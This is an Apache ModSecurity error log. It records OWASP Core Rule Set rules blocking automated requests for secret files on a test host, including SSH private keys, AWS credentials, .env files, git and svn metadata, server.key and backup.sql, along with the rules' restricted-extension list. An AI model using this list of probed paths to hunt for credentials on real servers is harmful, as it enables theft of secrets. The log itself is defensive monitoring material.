[Sun Mar 16 22:10:47.576898 2025] [:error] [pid 1825901] [client 213.232.87.228:53567] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z9c-V1td0ELtN3N5taKcnAAAAAk"]
[Sun Mar 16 22:10:47.577329 2025] [:error] [pid 1825901] [client 213.232.87.228:53567] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z9c-V1td0ELtN3N5taKcnAAAAAk"]
[Sun Mar 16 22:10:47.577738 2025] [:error] [pid 1825901] [client 213.232.87.228:53567] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z9c-V1td0ELtN3N5taKcnAAAAAk"]
[Sun Mar 16 22:10:47.614524 2025] [:error] [pid 1825883] [client 213.232.87.228:7065] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z9c-V4p7diytsfYOYbHFxQAAAAA"]
[Sun Mar 16 22:10:47.614833 2025] [:error] [pid 1825883] [client 213.232.87.228:7065] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z9c-V4p7diytsfYOYbHFxQAAAAA"]
[Sun Mar 16 22:10:47.614927 2025] [:error] [pid 1825864] [client 213.232.87.228:63435] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z9c-Vxv0BTBfu7FAinEyawAAAAU"]
[Sun Mar 16 22:10:47.615010 2025] [:error] [pid 1825883] [client 213.232.87.228:7065] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z9c-V4p7diytsfYOYbHFxQAAAAA"]
[Sun Mar 16 22:10:47.615092 2025] [:error] [pid 1825864] [client 213.232.87.228:63435] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z9c-Vxv0BTBfu7FAinEyawAAAAU"]
[Sun Mar 16 22:10:47.615245 2025] [:error] [pid 1825864] [client 213.232.87.228:63435] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z9c-Vxv0BTBfu7FAinEyawAAAAU"]
[Sun Mar 16 22:10:47.768508 2025] [:error] [pid 1825900] [client 213.232.87.228:57563] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z9c-V1GoAX5kpe2coJOPxAAAAAQ"]
[Sun Mar 16 22:10:47.768953 2025] [:error] [pid 1825900] [client 213.232.87.228:57563] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z9c-V1GoAX5kpe2coJOPxAAAAAQ"]
[Sun Mar 16 22:10:47.769463 2025] [:error] [pid 1825900] [client 213.232.87.228:57563] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z9c-V1GoAX5kpe2coJOPxAAAAAQ"]
[Sun Mar 16 22:10:47.863223 2025] [:error] [pid 1825883] [client 213.232.87.228:37561] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z9c-V4p7diytsfYOYbHFxgAAAAA"]
[Sun Mar 16 22:10:47.863533 2025] [:error] [pid 1825883] [client 213.232.87.228:37561] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z9c-V4p7diytsfYOYbHFxgAAAAA"]
[Sun Mar 16 22:10:47.863833 2025] [:error] [pid 1825883] [client 213.232.87.228:37561] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z9c-V4p7diytsfYOYbHFxgAAAAA"]
[Sun Mar 16 22:10:47.866662 2025] [:error] [pid 1825864] [client 213.232.87.228:34061] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z9c-Vxv0BTBfu7FAinEybAAAAAU"]
[Sun Mar 16 22:10:47.866809 2025] [:error] [pid 1825864] [client 213.232.87.228:34061] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z9c-Vxv0BTBfu7FAinEybAAAAAU"]
[Sun Mar 16 22:10:47.866961 2025] [:error] [pid 1825864] [client 213.232.87.228:34061] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z9c-Vxv0BTBfu7FAinEybAAAAAU"]
[Sun Mar 16 22:10:47.918473 2025] [:error] [pid 1825902] [client 213.232.87.228:23937] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QwAAAAo"]
[Sun Mar 16 22:10:47.918776 2025] [:error] [pid 1825902] [client 213.232.87.228:23937] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QwAAAAo"]
[Sun Mar 16 22:10:47.918933 2025] [:error] [pid 1825902] [client 213.232.87.228:23937] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QwAAAAo"]
[Mon Mar 17 11:30:15.045413 2025] [:error] [pid 1841172] [client 45.148.10.172:60012] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9f5t7YC10Kk9Fy4h7_YKAAAAAk"]
[Mon Mar 17 11:30:15.046141 2025] [:error] [pid 1841172] [client 45.148.10.172:60012] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9f5t7YC10Kk9Fy4h7_YKAAAAAk"]
[Mon Mar 17 11:30:15.046626 2025] [:error] [pid 1841172] [client 45.148.10.172:60012] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9f5t7YC10Kk9Fy4h7_YKAAAAAk"]
[Tue Mar 18 13:22:02.558496 2025] [:error] [pid 1854489] [client 45.148.10.172:44644] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9llajB3nQbAbhXiuF8dJQAAAAE"]
[Tue Mar 18 13:22:02.559086 2025] [:error] [pid 1854489] [client 45.148.10.172:44644] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9llajB3nQbAbhXiuF8dJQAAAAE"]
[Tue Mar 18 13:22:02.559445 2025] [:error] [pid 1854489] [client 45.148.10.172:44644] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9llajB3nQbAbhXiuF8dJQAAAAE"]
[Tue Mar 18 14:38:59.948581 2025] [:error] [pid 1854489] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9l3czB3nQbAbhXiuF8dKQAAAAE"]
[Tue Mar 18 14:38:59.949215 2025] [:error] [pid 1854489] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9l3czB3nQbAbhXiuF8dKQAAAAE"]
[Tue Mar 18 14:38:59.949646 2025] [:error] [pid 1854489] [client 45.148.10.98:43162] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9l3czB3nQbAbhXiuF8dKQAAAAE"]
[Tue Mar 18 18:55:44.090667 2025] [:error] [pid 1854490] [client 45.148.10.98:38742] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9mzoAu6M65WajySw62PGwAAAAI"]
[Tue Mar 18 18:55:44.091391 2025] [:error] [pid 1854490] [client 45.148.10.98:38742] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9mzoAu6M65WajySw62PGwAAAAI"]
[Tue Mar 18 18:55:44.091844 2025] [:error] [pid 1854490] [client 45.148.10.98:38742] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9mzoAu6M65WajySw62PGwAAAAI"]
[Tue Mar 18 21:49:53.596556 2025] [:error] [pid 1855411] [client 45.148.10.98:52546] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nccTYsKaIEcO3A2u94mQAAAAY"]
[Tue Mar 18 21:49:53.597291 2025] [:error] [pid 1855411] [client 45.148.10.98:52546] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nccTYsKaIEcO3A2u94mQAAAAY"]
[Tue Mar 18 21:49:53.597818 2025] [:error] [pid 1855411] [client 45.148.10.98:52546] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9nccTYsKaIEcO3A2u94mQAAAAY"]
[Tue Mar 18 21:59:33.596301 2025] [:error] [pid 1855411] [client 216.81.248.20:48394] [client 216.81.248.20] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9netTYsKaIEcO3A2u94mgAAAAY"]
[Tue Mar 18 21:59:33.598338 2025] [:error] [pid 1855411] [client 216.81.248.20:48394] [client 216.81.248.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9netTYsKaIEcO3A2u94mgAAAAY"]
[Tue Mar 18 21:59:33.598894 2025] [:error] [pid 1855411] [client 216.81.248.20:48394] [client 216.81.248.20] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9netTYsKaIEcO3A2u94mgAAAAY"]
